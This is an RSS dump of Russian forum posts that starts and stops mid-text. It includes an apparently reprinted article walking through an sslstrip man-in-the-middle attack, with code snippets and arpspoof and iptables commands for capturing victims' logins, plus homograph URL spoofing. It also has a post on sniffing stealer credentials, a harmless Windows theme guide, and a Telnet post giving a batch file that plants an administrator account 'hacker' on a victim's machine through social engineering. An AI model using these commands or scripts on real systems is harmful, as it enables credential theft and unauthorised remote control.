сертификатов. Чтобы удостовериться в подлинности конкретного сайта, используется специально выписанный для него сертификат (Site Certificate). Для проверки подлинности таких сертификатов в свою очередь существуют сертификаты центра сертификации (CA Certificate); они обладают максимальным доверием и встраиваются непосредственно в браузер (их также называют корневыми – Root CA). Помимо этого, существуют промежуточные сертификаты (Intermediate CA), которые также используются для подписи Site Certificate, однако, в отличие от CA Certificate, не гарантируют легитимность сайта и не встраиваются в браузер. Получается, что в самом простом случае вся цепочка состоит из следующих звеньев: «CA Certificate - Intermediate CA - Site Certificate», однако промежуточных сертификатов может быть больше. Так или иначе, проверка подлинности сайта осуществляется с помощью простой рекурсивной процедуры: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* сначала проверяется, чтобы крайний в цепочке сертификат был выписан на имя сайта, к которому идет обращение; &lt;br /&gt; * проверяется, не просрочен ли сертификат; &lt;br /&gt; * в конце проверяется подпись, с помощью которой он подписан.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Подпись может принадлежать или корневому сертификату, и это значит, что сертификату можно 100% доверять, или же некоторому промежуточному сертификату. В последнем случае необходимо подняться на уровень выше и выполнить проверку еще раз – и так до тех пор, пока не будет найдена подпись корневого сертификата. Или не будет, что означает: удостоверить в подлинности сайта невозможно. &lt;br /&gt;&lt;br /&gt; Sslsniff, или как все начиналось &lt;br /&gt;&lt;br /&gt; Представим такую картину: у нас есть сертификат для нашего сайта xakep.ru; он является последним звеном в цепочке «Root CA - Intermediate CA - Intermediate CA - xakep.ru». Почему бы не попробовать сделать сертификат сайта промежуточным и не подписать с его помощью другой ресурс, например, paypal.com? Все условия проверки для цепочки (Root CA - Intermediate CA - Intermediate CA - xakep.ru - paypal.com) при этом останутся выполненными: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* подписи всех сертификатов действительны; &lt;br /&gt;&lt;br /&gt; * ни один сертификат не просрочен; &lt;br /&gt;&lt;br /&gt; * корневой сертификат встроен в браузер и обладает полным доверием.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Тут одна лишь загвоздка: как же мы выдадим сертификат? &lt;br /&gt;&lt;br /&gt; У каждого сертификата есть неприметное поле Basic Constraints, которое определяет, принадлежит ли он центру сертификации или нет. Что удивительно, далеко не все центры ранее выставляли ему значение CA=FALSE[S1]. Более того, большинство браузеров даже не утруждались проверкой значения этого поля. Получается, имея на руках действительный сертификат, можно было создать и подписать сертификат для любого другого домена – и браузеры бы даже не заподозрили неладное! &lt;br /&gt; Несмотря на многочисленные заявления, что эксплуатировать это невозможно, разработчик Moxie Marlinspike опубликовал рабочую утилиту sslsniff, которая реализовывала простую атаку MITM (Man in the middle), перехватывая весь трафик. Смысл сводился к следующему: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* прога перехватывала клиентские запросы на соединение с защищенным HTTPS-сайтом; &lt;br /&gt;&lt;br /&gt; * сама создавала сертификат для сайта, к которому коннектится клиент, и подписывала его с помощью уже имеющегося сертификата; &lt;br /&gt;&lt;br /&gt; * со своей стороны устанавливала обычное HTTPS-соединение с нужным сервером и выступала своеобразной проксей, снифая весь трафик.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Все, что требовалась для работы – это предоставить sslsniff действительный сертификат. К сожалению, с 2002-го, когда была опубликована утилита, браузеры стали умнее и такой проверкой больше не пренебрегают. Увы, такой способ нам уже не поможет! &lt;br /&gt;&lt;br /&gt; Продолжение истории - Sslstrip &lt;br /&gt;&lt;br /&gt; Чтобы разобраться с другим способом, вспомни, как мы обычно попадаем на защищенные страницы. Допустим, ты захотел проверить свой почтовый ящик Gmail. Просто набираешь в адресной строке mail.google.com и попадаешь на защищенную страницу авторизации. Никто не набирает &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?http://,&quot; title=&quot;http://,&quot; rel=&quot;nofollow&quot;&gt;http://,&lt;/a&gt; а уж тем более &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?https://.&quot; title=&quot;https://.&quot; rel=&quot;nofollow&quot;&gt;https://.&lt;/a&gt; Получается, что пользователь попадает на защищенную страницу двумя путями: кликая на ссылки/кнопки или через редиректы. Переход на защищенные ресурсы осуществляется посредством обычного http-протокола, а его, как я уже говорил, легко перехватить. &lt;br /&gt;&lt;br /&gt; Да, липовый сертификат «на лету» создать не выйдет. Так, может, обойдемся вовсе без сертификата? Зачем его создавать, если есть шанс перехватить запрос на защищенное соединение с сервером и заставить пользователя общаться с нами по самому обычному HTTP? Именно эта идея и легла в основу программы sslstrip, которую на недавней конференции Black Hat DC 2009 представил все тот же хакер Moxie Marlinspike. &lt;br /&gt;&lt;br /&gt; Предлагаю рассмотреть ее более подробно. Помимо описания, я буду приводить небольшие отрывки исходников на Python&apos;е. В основе, опять же, лежит принцип MITM, позволяющий вклиниться между сервером и клиентом, просматривая проходящий HTTP-трафик. В каждой перехваченной ссылке на защищенной ресурс выполняется замена «https://» на «http://», а исходная и измененная URL заносятся в таблицу соответствия. &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;def replaceSecureLinks(self, data&amp;#41;: &lt;br /&gt; data = DataShuffler.replaceSecureLinks(self, data&amp;#41; &lt;br /&gt; data = self.replaceSecureC*****s(data&amp;#41; &lt;br /&gt; data = self.replaceCssLinks(data&amp;#41; &lt;br /&gt; data = self.replaceSecureFavicon(data&amp;#41; &lt;br /&gt; iterator = re.finditer(self.linkExpression, data, re.IGNORECASE&amp;#41; &lt;br /&gt;&lt;br /&gt; for match in iterator: &lt;br /&gt; link = match.group(9&amp;#41; &lt;br /&gt;&lt;br /&gt; if not link.startswith(&apos;http&apos;&amp;#41;: &lt;br /&gt; logging.debug(&quot;Found relative link in secure transmission: &quot; + link&amp;#41; &lt;br /&gt;&lt;br /&gt; absoluteLink = &quot;http&amp;#58;//&quot;+self.serverHost+link &lt;br /&gt; absoluteLink = absoluteLink.replace(&apos;&amp;amp;&apos;, &apos;&amp;&apos;&amp;#41; &lt;br /&gt; self.secureLinkListener.addLink(absoluteLink&amp;#41;; &lt;br /&gt;&lt;br /&gt; return data&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Как только клиент посылает запрос на соединение с защищенным URL, мы подсовываем ему липовую ссылку, а сами, тем временем, устанавливаем настоящее HTTPS-соединение, выполняя запрос от своего имени. Получив ответ от сервера и опять выполнив замены в линках, отдаем контент пользователю по обычному HTTP-соединению. &lt;br /&gt; В результате получается замечательная картинка. Серверу, отдающему весь контент по защищенному каналу, нет никакого дела, от кого приходит подключение, а клиент не получает никаких предупреждений и даже не подозревает, что использует незащищенное соединение. А мы? А мы перехватываем весь трафик. &lt;img src=&quot;http://s48.ucoz.net/sm/23/smile.gif&quot; border=&quot;0&quot; align=&quot;absmiddle&quot; alt=&quot;smile&quot; /&gt; &lt;br /&gt;&lt;br /&gt; Несколько уловок &lt;br /&gt;&lt;br /&gt; Чтобы еще больше создать иллюзию, что все безопасно, будем отслеживать запросы favicon (это иконка, отображающаяся в адресной строке браузера непосредственно перед адресом). И когда получаем такой запрос для защищенного соединения, то подсовываем иконку с замочком, которая в обычной ситуации указывает на то, что соединение осуществляется по безопасному каналу. &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;def replaceSecureFavicon(self, data&amp;#41;: &lt;br /&gt; iterator = re.finditer(self.iconExpression, data, re.IGNORECASE&amp;#41; &lt;br /&gt;&lt;br /&gt; for match in iterator: &lt;br /&gt; link = match.group(1&amp;#41; &lt;br /&gt; link.replace(&apos;http&amp;#58;//&apos;, &apos;https://&apos;&amp;#41; &lt;br /&gt;&lt;br /&gt; if not link.startswith(&apos;http&amp;#58;//&apos;&amp;#41;: &lt;br /&gt; link = &apos;http&amp;#58;//&apos; + self.serverHost + link &lt;br /&gt;&lt;br /&gt; self.secureLinkListener.addSecureFavicon(link&amp;#41; &lt;br /&gt; self.secureLinkListener.addLink(link&amp;#41; &lt;br /&gt;&lt;br /&gt; return data&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Проблемы могут возникнуть: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* с компрессированным контентом, который сложно парсить; &lt;br /&gt;&lt;br /&gt; * с безопасными кукисами, которые не передают по незащищенному соединению; &lt;br /&gt;&lt;br /&gt; * с банально закешированными страницами, в которых мы не можем сделать замену.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Как быть? &lt;br /&gt;&lt;br /&gt; В кукисах нам потребуется убирать security bit в поле в Set-C*****, чтобы плюшки стали передаваться по обычному HTTP. От сжатия контента придется отказаться, удалив в хедерах HTML параметр content encodings (отключаем сжатие), а также if-modified-since (принудительно заставляем сервер отдавать страницу, даже если на ней не было изменений). &lt;br /&gt;&lt;br /&gt; Другая проблема – сессии. Пропуская этап авторизации, мы можем остаться без логина и пароля. Решение следующее: сессию тоже надо убивать, но нужна осторожность, чтобы не вызвать подозрений. Сессии имеют свойство истекать (заканчиваться), причем не всегда ясно, когда это произойдет. Одно можно сказать почти наверняка: они не истекают посреди активной работы. Поэтому сразу после начала MITM-атаки начинаем модифицировать трафик, проходящий через нас, но не трогаем C*****s в течение какого-то промежутка времени (например, 5 минут). Ждем эти 5 минут, и запоминаем все сессии, которые видели за это время. Если после 5 минут появляется какая-то новая, то получается, она уже долго работает и, если мы ее прибьем, то подозрений это, скорее всего, не вызовет. Вот, в общем-то, и все секреты успеха. &lt;br /&gt;&lt;br /&gt; Испытаем sslstrip в деле &lt;br /&gt;&lt;br /&gt; Но довольно лирики. Посмотрим, реально ли утащить чьи-нибудь логины и пароли. Опыты мы будем проводить на виртуальных машинах. Итак, у нас есть небольшая локальная сеть, состоящая из машины жертвы (192.168.1.3), нашей машины (192.168.1.5) и машины, служащей шлюзом в интернет (192.168.1.1). Теперь подготовим плацдарм для атаки. В качестве ОС на своей машине будем использовать популярный дистрибутив BackTrack3 (все то же самое можно проделать и под Виндой, поставив все необходимые программы и настроив систему, но зачем делать лишнюю работу, если кто-то уже сделал ее за тебя?). Итак, загружаем систему и устанавливаем sslstrip: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;#bt python setup.py install&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; В принципе, можно даже не устанавливать, а запускать sslstrip сразу: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;#bt python ./sslstrip.py -h - покажет список параметров.&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Чтобы все заработало, нам нужно немножко подконфигурировать систему. Сперва включим на машине режим перенаправления пакетов (forwarding mode). Делается это следующей командой: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;#bt echo &quot;1&quot; &gt; /proc/sys/net/ipv4/ip_forward&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Затем настроим iptables для перенаправления http-трафика: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;#bt iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port &lt;yourListenPort&gt;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; где &lt;yourListenPort&gt; - порт, которых будет слушать sslstrip, установим его в 8080, например. &lt;br /&gt;&lt;br /&gt; Теперь можно запустить и сам sslstrip: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;#bt sslstrip -a -l 8080 -w /root/log.txt&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Параметр &apos;-a&apos; означает, что мы будем логировать, весь проходящий http-трафик, &apos;-l&apos; указывает порт, который будем слушать, а &apos;-w&apos; задает путь к лог-файлу. Остался последний штрих - необходимо заставить жертву поверить, что мы и есть тот самый шлюз в интернет. Провернем это с помощью утилитки arpspoof: &lt;br /&gt;&lt;br /&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Код&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;arpspoof -i &lt;yourNetworkdDevice&gt; -t &lt;yourTarget&gt; &lt;theRoutersIpAddress&gt; &lt;br /&gt; &lt;yourNetworkdDevice&gt; - имя нашей сетевой карты (в нашем случае eth0&amp;#41;, &lt;br /&gt; &lt;yourTarget&gt; - адрес жертвы, &lt;br /&gt; &lt;theRoutersIpAddress&gt; - адрес шлюза &lt;br /&gt; #bt arpspoof -i eth0 -t 192.168.1.3 192.168.1.1&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br /&gt;&lt;br /&gt; Дождись, пока жертва полезет в инет, и проверяй логи. &lt;br /&gt;&lt;br /&gt; Нулевая безопасность &lt;br /&gt;&lt;br /&gt; Как видишь, безопасность SSL можно свести до нуля и превратить защищенное соединение в незащищенное, добавив на участке до пользователя коннект по обычному http-протоколу. Узнав, насколько это просто реализовать, думаю, ты с особой внимательностью будешь относиться к сообщениям браузера об использовании защищенного соединения и посматривать на адресную строку. Ни в коем случае не воспринимай статью, как побуждение к действию! Она лишь призвана показать основные ошибки SSL и HTTP. &lt;br /&gt;&lt;br /&gt; Немного статистики &lt;br /&gt;&lt;br /&gt; Moxie Marlinspike запустил sslstrip на tor узле и за 24 часа словил нехилый урожай: &lt;br /&gt;&lt;br /&gt; &lt;b&gt;* login.yahoo.com - 114 &lt;br /&gt; * Gmain - 50 &lt;br /&gt; * ticketmaster.com - 42 &lt;br /&gt; * rapidshare.com - 14 &lt;br /&gt; * Hotmail - 13 &lt;br /&gt; * paypal.com - 9 &lt;br /&gt; * linkedin.com -9 &lt;br /&gt; * facebook.com - 3&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; Хитрости URL &lt;br /&gt;&lt;br /&gt; Технику sslstrip вполне реально совместить с так называемыми омографическими атаками. Это атаки, при которых создается схожее имя домена с использованием букв алфавита другого языка – с целью ввести пользователей в заблуждение и создать впечатление, что они переходят на разрешенный веб-сайт. &lt;br /&gt; В 2005-м Eric Johanson зарегистрировал доменное имя pаypal.com, которое использует &apos;a&apos; из кириллицы и выглядит как paypal.com. Что нас не устраивает в такой атаке? Ну, во-первых, она ориентирована на один конкретный сайт, что ограничивает радиус действия. А во-вторых, браузеры научились правильно отображать IDN (Internationalized Domain Names — Интернационализованные Доменные Имена) и добавляют к имени так называемый Punycode - префикс «xn--». Фальшивый paypal.com преобразуется в &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?http://xn--pypal-4ve.com.&quot; title=&quot;http://xn--pypal-4ve.com.&quot; rel=&quot;nofollow&quot;&gt;http://xn--pypal-4ve.com.&lt;/a&gt; &lt;br /&gt;&lt;br /&gt; Итак, мы не можем использовать .com или любой другой домен первого уровня, ибо браузеры добавят к нему Punycode. Прикинем, какие символы чаще всего встречаются в URL[S2]? Правильно: «. / &amp; ?». Давай этим воспользуемся. Зарегистрируем домен ijjk.cn и получим сертификат для *.ijjk.cn. А потом применим старый трюк с буковками из другого алфавита, очень похожими на / и ? для создания фальшивых URL&apos;ок. Снова запускаем sslsniff, только на этот раз, вместо подмены https на http, будем подменять URL на свои липовые поддомены. Так, &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?https://www.gmail.com/accounts/ServiceLogin&quot; title=&quot;https://www.gmail.com/accounts/ServiceLogin&quot; rel=&quot;nofollow&quot;&gt;https://www.gmail.com/accounts/ServiceLogin&lt;/a&gt; становится &lt;a class=&quot;link&quot; target=&quot;_blank&quot; href=&quot;https://wabsity.do.am/go?https://www.google.com/accounts/ServiceLogin?!f.ijjk=.&quot; title=&quot;https://www.google.com/accounts/ServiceLogin?!f.ijjk=.&quot; rel=&quot;nofollow&quot;&gt;https://www.google.com/accounts/ServiceLogin?!f.ijjk=.&lt;/a&gt; Никакого Punycode в последней ссылке не наблюдается. Плюс ко всему, мы обладаем действительным сертификатом для данного домена. Заметить разницу практически невозможно. &lt;br /&gt;&lt;br /&gt; &lt;b&gt;• Author: Антон Жуков&lt;/b&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-73-1</guid>
		</item>
		<item>
			<title>Как украсть чужой стиллер, фейк (логин и пароль)!!!</title>
			<link>https://wabsity.do.am/forum/3-70-1</link>
			<pubDate>Wed, 15 May 2013 11:58:14 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: ПиЗдиМ ЧуЖИе стиЛЛЕры!&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>Думал думал и надумал выложить этот способ &lt;br /&gt; ЗАчем? спросите вы (я не знаю зачем просто делать нечего) &lt;br /&gt;&lt;br /&gt; Кто ещё не понял что ето всё такое поясню: &lt;br /&gt; Это способ наилучший для читера который хочет обезопасить свой комп от нежелательных программ &lt;br /&gt; короче ето так сказать среда как банка закрытая в которой сидит паук ядовитый &lt;br /&gt; вы паука посадили туда и закрыли  &lt;br /&gt; и он не вылезет пока вы сами того не захотите!!!  &lt;br /&gt;&lt;br /&gt; (пиздим пароли от стиллеров (ломаем стиллеры!!!) и так же проверяем на виртуалке всякую нечесть &lt;br /&gt;&lt;br /&gt; И так: &lt;br /&gt; Скачиваем &lt;a class=&quot;link&quot; href=&quot;https://wabsity.do.am/go?http://fintgamer.narod2.ru/Intercepter-NG.v093.zip&quot; title=&quot;http://fintgamer.narod2.ru/Intercepter-NG.v093.zip&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Intercepter-NG&lt;/a&gt; (самый (крутой (почти)) и простой СНИФФЕР &lt;br /&gt; Далее скачиваем &lt;a class=&quot;link&quot; href=&quot;https://wabsity.do.am/go?http://download.virtualbox.org/virtualbox/4.2.10/VirtualBox-4.2.10-84105-Win.exe&quot; title=&quot;http://download.virtualbox.org/virtualbox/4.2.10/VirtualBox-4.2.10-84105-Win.exe&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Oracle VM VirtualBox&lt;/a&gt; Зачем? (ну не на своём же компе испытывать стиллер) &lt;br /&gt; И наконец &lt;a class=&quot;link&quot; href=&quot;https://wabsity.do.am/go?http://fintgamer.narod2.ru/Windows_XP_Sp3_XTreme_Ultimate_Edition_2011_RUS.torrent&quot; title=&quot;http://fintgamer.narod2.ru/Windows_XP_Sp3_XTreme_Ultimate_Edition_2011_RUS.torrent&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Windows XP Xtreme&lt;/a&gt; (а зачем винду???) а как без неё вы запустите виртуальную винду? &lt;br /&gt; &lt;a class=&quot;link&quot; href=&quot;https://wabsity.do.am/go?http://fintgamer.narod2.ru/Proxy.exe&quot; title=&quot;http://fintgamer.narod2.ru/Proxy.exe&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Proxy Server&lt;/a&gt; (Для тех у кого винда XP) &lt;br /&gt;&lt;br /&gt; Дальше просто ВИДЕО без видео никак: (Видос HD но без звука так как микро так сказать дешёвый) &lt;br /&gt;&lt;br /&gt; &lt;div align=&quot;center&quot;&gt;&lt;!--BBvideo--&gt;&lt;span id=&quot;scr15TV1uCA3Y&quot;&gt;&lt;/span&gt;&lt;script type=&quot;text/javascript&quot;&gt;_uVideoPlayer({&apos;url&apos;:&apos;http://www.youtube.com/watch?v=NnBJUIOIDr8&apos;,&apos;width&apos;:&apos;425&apos;,&apos;height&apos;:&apos;355&apos;},&apos;scr15TV1uCA3Y&apos;);&lt;/script&gt;&lt;!--/BBvideo--&gt;&lt;/div&gt;﻿ &lt;br /&gt; &lt;span style=&quot;font-size:21pt;&quot;&gt;&lt;span style=&quot;color:#ff0000&quot;&gt;&lt;div align=&quot;center&quot;&gt;&lt;b&gt;И помните что делать стиллеры самому плохо а пиздить чужие ХОРОШО!:D&lt;/b&gt;&lt;/div&gt;&lt;/span&gt; &lt;br /&gt;&lt;/span&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>zloi_volk</dc:creator>
			<guid>https://wabsity.do.am/forum/3-70-1</guid>
		</item>
		<item>
			<title>КАК УСТАНОВИТЬ ТЕМЫ ДЛЯ WINDOWS 8</title>
			<link>https://wabsity.do.am/forum/3-51-1</link>
			<pubDate>Mon, 18 Feb 2013 09:01:07 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: Установка новой темы оформления для Windows 8 почти не отлич&lt;br /&gt;Автор темы: Ales&lt;br /&gt;Автор последнего сообщения: Ales&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;b&gt;Установка новой темы оформления для Windows 8 почти не отличается как это было на семерке. &lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;b&gt;1. Скачиваем любой архив из раздела - темы для Windows 8. &lt;br /&gt; 2. Устанавливаем патч для сторонних тем - UltraUXThemePatcher, и перезагружаем компьютер. &lt;br /&gt; 3. Извлекаем архив и копируем файлы темы в директорию &quot;C:&amp;#92;WIndows&amp;#92;Resources&amp;#92;Themes&amp;#92;&quot;, это действие нужно сделать правильно, иначе у Вас тема не будет работать. Внимательно посмотрите рисунок ниже. &lt;br /&gt; &lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;div align=&quot;center&quot;&gt;&lt;!--IMG1--&gt;&lt;a href=&quot;http://icsez.tk/_fr/0/7267938.jpg&quot; class=&quot;ulightbox&quot; target=&quot;_blank&quot; title=&quot;Нажмите, для просмотра в полном размере...&quot;&gt;&lt;img alt=&quot;&quot; style=&quot;margin:0;padding:0;border:0;&quot; src=&quot;http://icsez.tk/_fr/0/s7267938.jpg&quot; align=&quot;&quot; /&gt;&lt;/a&gt;&lt;!--IMG1--&gt;&lt;/div&gt; &lt;br /&gt;&lt;br /&gt; &lt;b&gt;Если все сделано правильно, то тема отобразится в панели персонализации, где ее вы уже можите применить. &lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;b&gt;В некоторых случаях для соответствия со скриншотом приходится заменять системные файлы. Как это сделать? &lt;br /&gt; 1. Получаем права доступа к файлу с помощью утилиты - TakeOwnershipEx для Win8. (Пример в этой статье) &lt;br /&gt; 2. После чего можно заменять системный файл, мы возьмем за пример ExplorerFrame.dll. Ищем его в папке &quot;C:&amp;#92;Windows&amp;#92;System32&quot;, и переименовываем в к примеру ExplorerFrame.dlloriginal, после в ту же папку копируем новый ExplorerFrame.dll, и перезагружаем проводник или компьютер. &lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;span style=&quot;color:#ff0000&quot;&gt;&lt;div align=&quot;center&quot;&gt;&lt;b&gt;UltraUXThemePatcher &lt;br /&gt;&lt;br /&gt; TakeOwnershipEx&lt;/b&gt; &lt;br /&gt;&lt;br /&gt; &lt;span style=&quot;font-size:15pt;&quot;&gt;Прикреплены&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;</content:encoded>
			<category>Операционные Системы</category>
			<dc:creator>Ales</dc:creator>
			<guid>https://wabsity.do.am/forum/3-51-1</guid>
		</item>
		<item>
			<title>Telnet</title>
			<link>https://wabsity.do.am/forum/3-5-1</link>
			<pubDate>Tue, 08 Mar 2011 21:56:18 GMT</pubDate>
			<description>Форум: &lt;a href=&quot;https://wabsity.do.am/forum/3&quot;&gt;Операционные Системы&lt;/a&gt;&lt;br /&gt;Описание темы: Телнет - сетевой протокол для работы в удаленной системе в т&lt;br /&gt;Автор темы: zloi_volk&lt;br /&gt;Автор последнего сообщения: zloi_volk&lt;br /&gt;Количество ответов: 0</description>
			<content:encoded>&lt;span style=&quot;font-size:13pt;&quot;&gt;&lt;b&gt;Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.&lt;/span&gt;&lt;/b&gt; &lt;p&gt; &lt;!--uSpoiler--&gt;&lt;div class=&quot;uSpoilerClosed&quot; id=&quot;uSpoilerX6TSiI&quot;&gt;&lt;div class=&quot;uSpoilerButBl&quot;&gt;&lt;input type=&quot;button&quot; class=&quot;uSpoilerButton&quot; onclick=&quot;if($(&apos;#uSpoilerX6TSiI&apos;)[0]){if ($(&apos;.uSpoilerText&apos;,$(&apos;#uSpoilerX6TSiI&apos;))[0].style.display==&apos;none&apos;){$(&apos;.uSpoilerText&apos;,$(&apos;#uSpoilerX6TSiI&apos;))[0].style.display=&apos;&apos;;$(&apos;.uSpoilerButton&apos;,$(&apos;#uSpoilerX6TSiI&apos;)).val(&apos;[&amp;#92;&amp;#8211;] Читать&apos;);$(&apos;#uSpoilerX6TSiI&apos;).attr(&apos;class&apos;,&apos;uSpoilerOpened&apos;);}else {$(&apos;.uSpoilerText&apos;,$(&apos;#uSpoilerX6TSiI&apos;))[0].style.display=&apos;none&apos;;$(&apos;.uSpoilerButton&apos;,$(&apos;#uSpoilerX6TSiI&apos;)).val(&apos;[+] Читать&apos;);$(&apos;#uSpoilerX6TSiI&apos;).attr(&apos;class&apos;,&apos;uSpoilerClosed&apos;);}}&quot; value=&quot;[+] Читать&quot;/&gt;&lt;/div&gt;&lt;div class=&quot;uSpoilerText&quot; style=&quot;display:none;&quot;&gt;&lt;!--ust--&gt;&lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;Телнет - сетевой протокол для работы в удаленной системе в терминальном&amp;nbsp;&amp;nbsp;&lt;br /&gt; режиме(т.е. режиме командной строки&amp;#41;. Все делается &quot;ручками&quot;, мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал, &lt;br /&gt; позволяющая нам подключаться к удаленным компьютерам. &lt;br /&gt;&lt;br /&gt; Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у&amp;nbsp;&amp;nbsp;&lt;br /&gt; жертвы. Бывает такое, что этот сервис уже будет весить у &quot;врага&quot;, но при попытки&amp;nbsp;&amp;nbsp;&lt;br /&gt; подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,&amp;nbsp;&amp;nbsp;&lt;br /&gt; но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким&amp;nbsp;&amp;nbsp;&lt;br /&gt; методом как социальная инженерия(СИ&amp;#41;. Я думаю не надо объяснять что это такое.&amp;nbsp;&amp;nbsp;&lt;br /&gt; Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот&amp;nbsp;&amp;nbsp;&lt;br /&gt; метод в данном случае наиболее актуален.&amp;nbsp;&amp;nbsp;&lt;br /&gt; Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый&amp;nbsp;&amp;nbsp;&lt;br /&gt; тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе&amp;nbsp;&amp;nbsp;&lt;br /&gt; порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто&amp;nbsp;&amp;nbsp;&lt;br /&gt; написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной &lt;br /&gt; строки&amp;#41;. &lt;br /&gt; тело батника: &lt;br /&gt;&lt;br /&gt; chcp 1251 &lt;br /&gt; net user SUPPORT_388945a0 /delete &lt;br /&gt; net user hacker hack /add &lt;br /&gt; net localgroup Администраторы hacker /add &lt;br /&gt; net localgroup Пользователи SUPPORT_388945a0 /del &lt;br 